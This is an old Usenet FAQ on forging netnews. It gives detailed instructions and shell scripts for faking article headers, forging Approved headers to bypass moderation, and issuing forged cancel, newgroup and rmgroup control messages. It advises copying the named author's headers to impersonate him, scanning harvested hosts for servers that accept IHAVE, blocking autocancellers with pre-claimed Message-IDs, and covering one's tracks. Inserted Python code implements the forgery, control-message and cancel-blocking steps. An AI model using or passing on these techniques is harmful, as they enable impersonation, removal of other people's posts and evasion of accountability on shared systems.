Article 25963 of alt.security:
Newsgroups: comp.admin.policy,comp.security.misc,alt.security,misc.legal.computing,alt.censorship,alt.comp.acad-freedom.talk,alt.current-events.net-abuse
Path: nntpd.lkg.dec.com!crl.dec.com!crl.dec.com!bloom-beacon.mit.edu!news.moneng.mei.com!news.ecn.bgu.edu!vixen.cso.uiuc.edu!news.cts.eiu.edu!ix.netcom.com!acad2!news-d.megaweb.com!uu.net!tale
Subject: FAQ: Better living through forgery (Updated!)
Expires: 8 Dec 1995 14:30
NNTP-Posting-host: pc002.uu.net
Organization: UUNet Communications
From: tale@uunet.uu.net (David C Lawrence)
Approved: tale@uunet.uu.net
Sender: tale@uunet.uu.net (David C Lawrence)
Message-ID: <837177003.48888@uunet.uu.net>
Date: Sun, 9 Jul 1995 15:39:03 GMT
Lines: 184
Xref: nntpd.lkg.dec.com comp.admin.policy:6939 comp.security.misc:19044 alt.security:25963 misc.legal.computing:14877 alt.censorship:56369 alt.comp.acad-freedom.talk:17265 alt.current-events.net-abuse:29555

Anonymous netnews without "anonymous" remailers

Inspired by the recent "NetNews Judges-L" events, this file has been updated to cover forging control messages. It is being posted periodically to address the increasing trend of "how do I fake news?" questions from the lamers, and the revelation that anonymous remailers are UNSAFE. In addition to anonymous posting, you can also do your own article canceling and create and destroy your own newsgroups using the information presented here.

Save any news article to a file, with all the headers intact. Then edit this file, and remove any header lines of the form

    From some!random!path!user    (note: "From ", not "From: " !!)
    Article:
    Lines:
    Xref:

Shorten the Path: header down to its LAST two or three "bangized" components. This makes the article look as though it originally hit the net at or near the host you send it to, rather than wherever it really came from. Or you can construct a completely new Path: line to reflect your assumed alias.
Make some change to the Message-ID: field that isn't likely to be duplicated anywhere. This is usually best done by adding a couple of random characters to the part before the @, since news posting programs generally use a fixed-length field to generate these IDs. Change the other headers to say what you like: From:, Newsgroups:, Sender:, etc. Replace the original message text with your message. If you are posting to a moderated group or posting a control message, remember to put in an Approved: header to bypass the moderation mechanism.

To specifically cancel someone else's article, you need its message-ID. Your message headers, in addition to what's already there, should also contain the following, with that message-ID (angle brackets included) in place of <message-id>. This makes it a "control message". Control messages also require an Approved: header, so add one.

    Subject: cmsg cancel <message-id>
    Control: cancel <message-id>
    Approved: luser@twits.site.com

Newsgroups are created and destroyed with control messages, too. If you wanted to create, for instance, comp.misc.microsoft.sucks, your control headers would look like

    Subject: cmsg newgroup comp.misc.microsoft.sucks
    Control: newgroup comp.misc.microsoft.sucks

Add the string "moderated" at the end of these if you want the group to be "moderated with no moderator", as with alt.hackers. Somewhere in the body of your message, you should include the following text, changed to the description of the group you're creating:

    For your newsgroups file:
    comp.misc.microsoft.sucks	We don't do windows

To remove a group, substitute "rmgroup" for "newgroup" in the header lines above. Keep in mind that most sites run all "rmgroup" requests through a human news-master, who may or may not decide to honor it. Group creation is more likely to be automatic than deletion at most installations.
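The header recipe above (strip the mbox "From " envelope plus Article:/Lines:/Xref:, shorten Path:, salt the Message-ID, overwrite the rest, then turn the result into a cancel, newgroup or rmgroup control message) as a worked example. This is editor-added Python, not part of the original posting and not code from any news software; the sample article, its hosts and the addresses are constructed. It only builds the message text; note that any reasonably current news server verifies newgroup/rmgroup control messages with pgpverify and requires authentication before it will accept a POST, so the unsigned messages produced here are a model of the 1995 format, nothing more.

```python
# Constructed sample of a saved article in mbox form (the leading "From " line
# is the mailbox envelope, not a header).  Hosts and addresses are invented.
SAVED_ARTICLE = """\
From some!random!path!user Sun Jul  9 15:39:03 1995
Path: a.example!b.example!c.example!d.example!user
From: user@d.example (Some User)
Newsgroups: alt.test
Subject: test
Message-ID: <837177003.48888@d.example>
Date: Sun, 9 Jul 1995 15:39:03 GMT
Article: 123
Lines: 2
Xref: a.example alt.test:123

first body line
second body line
"""

DROP_HEADERS = {"article", "lines", "xref"}   # headers the text says to remove


def split_article(text):
    """Return ([(name, value), ...], body).  Drops the mbox "From " envelope
    line and folds continuation lines into the preceding header."""
    head, _, body = text.partition("\n\n")
    headers = []
    for line in head.split("\n"):
        if line.startswith("From "):            # envelope, not "From:"
            continue
        if line[:1] in (" ", "\t") and headers:  # folded header line
            name, value = headers[-1]
            headers[-1] = (name, value + "\n" + line)
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers, body


def join_article(headers, body):
    return "\n".join(f"{n}: {v}" for n, v in headers) + "\n\n" + body


def prepare(text, salt, keep_path=3, set_headers=None):
    """Apply the recipe: drop Article/Lines/Xref, keep only the last
    `keep_path` Path: hops, append `salt` to the local part of the
    Message-ID, then overwrite any headers given in `set_headers`."""
    headers, body = split_article(text)
    out = []
    for name, value in headers:
        key = name.lower()
        if key in DROP_HEADERS:
            continue
        if key == "path":
            value = "!".join(value.split("!")[-keep_path:])
        elif key == "message-id":
            local, at, host = value.partition("@")
            value = f"{local}{salt}{at}{host}"
        out.append((name, value))
    for name, value in (set_headers or {}).items():
        out = [(n, v) for n, v in out if n.lower() != name.lower()]
        out.append((name, value))
    return out, body


def control_message(headers, body, control, approved):
    """Turn a prepared header list into a control message: Subject: is
    "cmsg <control>", Control: carries the command, and Approved: is added
    because servers treat control messages like moderated postings."""
    keep = [(n, v) for n, v in headers
            if n.lower() not in ("subject", "control", "approved")]
    keep += [("Subject", "cmsg " + control), ("Control", control),
             ("Approved", approved)]
    return join_article(keep, body)


def cancel(headers, target_id, approved):
    return control_message(headers, f"cancel {target_id}\n",
                           f"cancel {target_id}", approved)


def newgroup(headers, group, description, approved, moderated=False):
    control = f"newgroup {group}" + (" moderated" if moderated else "")
    body = f"For your newsgroups file:\n{group}\t{description}\n"
    return control_message(headers, body, control, approved)


def rmgroup(headers, group, approved):
    return control_message(headers, f"rmgroup {group}\n",
                           f"rmgroup {group}", approved)


if __name__ == "__main__":
    hdrs, body = prepare(SAVED_ARTICLE, salt="xq", keep_path=2,
                         set_headers={"From": "nobody@nowhere.invalid",
                                      "Newsgroups": "alt.test"})
    print(join_article(hdrs, "replacement text\n"))
    print(cancel(hdrs, "<target@twits.site.com>", "luser@twits.site.com"))
```

`prepare()` keeps the header order of the saved article, so the result still looks like something a normal posting program emitted; the only headers it reorders are the ones you explicitly overwrite, which are appended at the end.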
Any newsgroup changes are more likely to take effect if they come from me, since my name is hardwired into many of the NNTP control scripts, so using the From: and Approved: headers from this posting is recommended.

Save your changed article, check it to make sure it contains NO reference to yourself or your own site, and send it to your favourite NNTP server that permits transfers via the IHAVE command, using the following script:

=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server

if test "$2" = "" ; then
    echo "usage: $0 filename server"
    exit 1
fi
if test ! -f "$1" ; then
    echo "$1: not found"
    exit 1
fi

# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' "$1" | egrep '^[Mm]essage-[Ii][Dd]: ' | \
    sed 's/.*-[Ii][Dd]: //'`
echo "$msgid"

# feed the NNTP dialogue to telnet on port 119; the sleeps give the
# server time to answer each line before the next one is sent
( sleep 5
  echo "IHAVE $msgid"
  sleep 5
  cat "$1"
  sleep 1
  echo "."
  sleep 1
  echo QUIT
) | telnet "$2" 119
=======================

If your article doesn't appear in a few hours, try a different server. They are easy to find. Here's a script that will break a large file full of saved netnews into a list of hosts to try. Edit the output of this if you want, to remove obvious peoples' names and other trash.

=======================
#! /bin/sh
## Turn a file of saved news into a sorted list of hosts seen in Path: headers.
## Each bang-separated component goes on its own line; keep only dotted
## names and drop the .bitnet and .uucp ones, which are not reachable on IP.
FGV='fgrep -i -v'
egrep '^Path: ' "$1" | sed -e 's/^Path: //' | tr '!' '\n' \
    | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================

Once you have your host list, feed it to the following script.

=======================
#! /bin/sh
## Probe each host read from stdin: connect to port 119, send a bare IHAVE
## and record how the server answers.  The first "quit" is for the news
## server, the second for telnet itself once the connection has closed.
while read xx ; do
    if test "$xx" = "" ; then continue; fi
    echo "=== $xx"
    ( echo "open $xx 119"
      sleep 5
      echo ihave
      sleep 4
      echo .
      echo quit
      sleep 1
      echo quit
    ) | telnet
done
=======================

If the above script is called "findem" and you're using csh, you should do

    findem < list >& outfile

so that ALL output from telnet is captured. This takes a long time, but when it finishes, edit "outfile" and look for occurrences of "335". These mark answers from servers that might be willing to accept an article.
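The IHAVE dialogue that the first script drives blind with sleeps, shown with both sides of the conversation so the status codes you grep for in "outfile" can be seen in context. This is an editor-added Python example, not part of the original posting and not the code of any real news server; the server side is a deliberately minimal stand-in that implements just the history check (335 "send it" for an unseen Message-ID, 435 "already have it" for a known one, 235 after a successful transfer) and the whole thing runs over a local socket pair, so nothing touches the network. The article, its host and the banner text are constructed. One check the sh script lacks is included: a body line beginning with "." must be dot-stuffed on the wire, or the server takes it as the end of the article.

```python
import re
import socket
import threading

# Constructed article; the host is invented.  The body line that starts with
# "." is there to exercise dot-stuffing.
ARTICLE = """\
Path: d.example!user
From: user@d.example
Newsgroups: alt.test
Subject: ihave test
Message-ID: <abc123@d.example>

body line one
.a line that begins with a dot
"""


def message_id(article):
    """Same job as the sed pipeline in the sh script: the Message-ID from the
    header block, angle brackets kept."""
    head = article.split("\n\n", 1)[0]
    m = re.search(r"^message-id:\s*(<[^>]+>)", head, re.I | re.M)
    if not m:
        raise ValueError("no Message-ID header")
    return m.group(1)


def dot_stuffed(article):
    """Wire form: CRLF line ends, a leading '.' doubled, lone '.' terminator."""
    lines = article.rstrip("\n").split("\n")
    lines = ["." + l if l.startswith(".") else l for l in lines]
    return ("\r\n".join(lines) + "\r\n.\r\n").encode()


def fake_server(conn, store):
    """Toy news server: 335 for an unseen ID, 435 for an ID already in
    `store` (the history check that refuses duplicate Message-IDs)."""
    f = conn.makefile("rwb")
    f.write(b"200 fake.example NNTP server ready (posting ok)\r\n")
    f.flush()
    while True:
        line = f.readline()
        if not line:
            break
        cmd = line.decode("latin-1").strip()
        if cmd.upper().startswith("IHAVE "):
            mid = cmd.split(None, 1)[1]
            if mid in store:
                f.write(b"435 already have it, do not send\r\n")
            else:
                f.write(b"335 send it\r\n")
                f.flush()
                body = []
                while True:
                    l = f.readline()
                    if not l or l == b".\r\n":
                        break
                    body.append(l[1:] if l.startswith(b"..") else l)  # un-stuff
                store[mid] = b"".join(body)
                f.write(b"235 article transferred ok\r\n")
        elif cmd.upper() == "QUIT":
            f.write(b"205 closing connection\r\n")
            f.flush()
            break
        else:
            f.write(b"500 command not recognized\r\n")
        f.flush()
    f.close()
    conn.close()


def ihave(conn, article):
    """Client side of the exchange: banner, IHAVE, article if invited, QUIT."""
    f = conn.makefile("rwb")
    result = {"banner": f.readline().decode().strip(), "transfer": None}
    f.write(f"IHAVE {message_id(article)}\r\n".encode())
    f.flush()
    result["ihave"] = f.readline().decode().strip()
    if result["ihave"].startswith("335"):
        f.write(dot_stuffed(article))
        f.flush()
        result["transfer"] = f.readline().decode().strip()
    f.write(b"QUIT\r\n")
    f.flush()
    result["quit"] = f.readline().decode().strip()
    f.close()
    return result


def run_exchange(article, already_known=()):
    """Run client and fake server over a local socket pair (no network)."""
    store = {mid: b"" for mid in already_known}
    client, server = socket.socketpair()
    t = threading.Thread(target=fake_server, args=(server, store), daemon=True)
    t.start()
    try:
        result = ihave(client, article)
    finally:
        client.close()
    t.join(timeout=5)
    return result, store


def posting_allowed(banner):
    """A 200 banner means "posting ok": POST works there (but may add
    NNTP-Posting-Host); a 201 banner means no posting, though IHAVE may
    still be accepted."""
    return banner.startswith("200")


if __name__ == "__main__":
    print(run_exchange(ARTICLE)[0])
    print(run_exchange(ARTICLE, already_known=[message_id(ARTICLE)])[0])
```

The second run in the `__main__` block shows the 435 case: the same article offered again is refused before any body is sent. That refusal is exactly the duplicate check that matters later in this article. A 335 only means the server is willing to hear the article; whether it keeps it is a separate question.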
A 335 response isn't a completely reliable indication, since some servers respond with acceptance and later drop articles. Try a given server with a slightly modified repeat of someone else's message, and see if it eventually appears. You may have to monitor the finding script a little while it is running, to make sure one of the telnets does not hang for some reason.

You will notice other servers that don't necessarily accept an IHAVE, but say "posting ok". You can do regular POSTs through these, but they may add an "NNTP-Posting-Host:" header containing the machine YOU came from and are therefore unsuitable for completely anonymous use.

If you post a controversial article, such as this one or proprietary source code or threats to bomb Parliament, you can be fairly sure that someone will try to cancel it fairly quickly. In fact, some people may have automatic measures in place to detect and cancel articles that they didn't really post. But these mechanisms are often automated enough that you can defeat them and have your article stay in the news system a little longer. Given an original Message-ID (ORIG@HOST, in the notation of the format list below), some autocancellers will examine the original ID and issue control messages with predictable new IDs derived from it, such as cancel.ORIG@HOST or cancel-ORIG@HOST. You can take advantage of this and post some innocuous messages using these predicted message-IDs shortly beforehand. Once these articles are in the news system, they will block posting of the attempted automatic cancels, because a server refuses any article whose Message-ID it has already seen. Then post your real message, and the autocancellers that use these original-ID permutations will fail to remove it! Your blocker-postings do not have to go to `control'. It does not matter which newsgroups they go to, as long as they are in the news system somewhere. Reposting a modified version of someone else's message is the subtlest way to claim a message-ID. This will not work, of course, if the canceller uses a new message ID, but it is worth mentioning.
You may find the idea of cancel-ID prediction useful if you are being victimized by someone else's cancelmoose. Some autocancel formats seen in the control group are:

    -ORIG@HOST
    cancel.ORIG@HOST
    cancel-ORIG@HOST
    Can_ORIG@HOST
    ORIG.c@HOST

By far cancel.ORIG@HOST is the most common.

I probably need not say that if your article is REALLY controversial, attempts will be made to backtrace its origin. You should take appropriate measures to cover your tracks. Many organizations place their news servers outside their firewalls and packet filters, so for instance with a source-routing setup, you can pretend to be anyone.

We maintain an IHAVE-friendly host right here: news.uu.net. Feel free to test these scripts through our server.

PLEASE USE THE INFORMATION IN THIS ARTICLE FOR CONSTRUCTIVE PURPOSES ONLY.
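Cancel-ID prediction and the blocking trick from the two paragraphs above, worked through against a toy model of a server's history check. This is editor-added Python, not part of the original posting and not the code of any cancelbot or news server: the five templates are the formats listed above, `NewsSpool` is a minimal stand-in for one server's duplicate-ID check (an article whose Message-ID is already known is refused, and a refused cancel removes nothing), and the Message-IDs in the test run are invented. The last case in the usage shows the limit the text itself names: a canceller that mints a fresh ID is not blocked.

```python
# Autocancel ID formats listed in the text, as templates over the local part
# (ORIG) and host of the original Message-ID.
CANCEL_FORMATS = (
    "-{orig}@{host}",
    "cancel.{orig}@{host}",      # by far the most common
    "cancel-{orig}@{host}",
    "Can_{orig}@{host}",
    "{orig}.c@{host}",
)


def split_message_id(mid):
    """'<local@host>' -> ('local', 'host'); the brackets are optional."""
    inner = mid.strip()
    if inner.startswith("<") and inner.endswith(">"):
        inner = inner[1:-1]
    local, at, host = inner.partition("@")
    if not (at and local and host):
        raise ValueError(f"malformed Message-ID: {mid!r}")
    return local, host


def predict_cancel_ids(mid):
    """Every Message-ID an autocanceller of one of the known formats would
    give its own cancel message for the article `mid`."""
    local, host = split_message_id(mid)
    return [f"<{fmt.format(orig=local, host=host)}>" for fmt in CANCEL_FORMATS]


class NewsSpool:
    """Toy model of one server's history check (assumption: the check is
    purely on Message-ID).  A duplicate ID is refused, and a refused cancel
    never removes its target."""

    def __init__(self):
        self.articles = {}          # Message-ID -> Control: header or None

    def accept(self, mid, control=None):
        if mid in self.articles:
            return False            # 435 already have it
        self.articles[mid] = control
        if control and control.startswith("cancel "):
            target = control.split(None, 1)[1]
            self.articles.pop(target, None)
        return True


def autocancel(spool, target_mid, fmt="cancel.{orig}@{host}"):
    """What a format-based autocanceller does: derive its own Message-ID
    from the target's and submit the cancel.  Returns whether it landed."""
    local, host = split_message_id(target_mid)
    own_id = f"<{fmt.format(orig=local, host=host)}>"
    return spool.accept(own_id, control=f"cancel {target_mid}")


def block_then_post(spool, real_mid):
    """The trick from the text: claim the predicted cancel IDs with innocuous
    articles first, then post the real article.  The blockers' newsgroups do
    not matter, so the model does not track them."""
    claimed = [b for b in predict_cancel_ids(real_mid) if spool.accept(b)]
    posted = spool.accept(real_mid)
    return claimed, posted


if __name__ == "__main__":
    orig = "<837177003.48888@uunet.uu.net>"     # the ID of this posting
    spool = NewsSpool()
    claimed, posted = block_then_post(spool, orig)
    print("blockers claimed:", claimed)
    for fmt in CANCEL_FORMATS:
        landed = autocancel(spool, orig, fmt)
        print(f"{fmt:24} -> {'removed' if landed else 'refused'}")
    print("real article still present:", orig in spool.articles)
    print("fresh-ID canceller:", autocancel(spool, orig, "fresh.{orig}@{host}"))
    print("real article still present:", orig in spool.articles)
```

Because the history check is per server, the blockers only help on servers that saw them before the cancel arrived; a cancel that reaches a server first is accepted there, and its Message-ID then blocks your blocker instead.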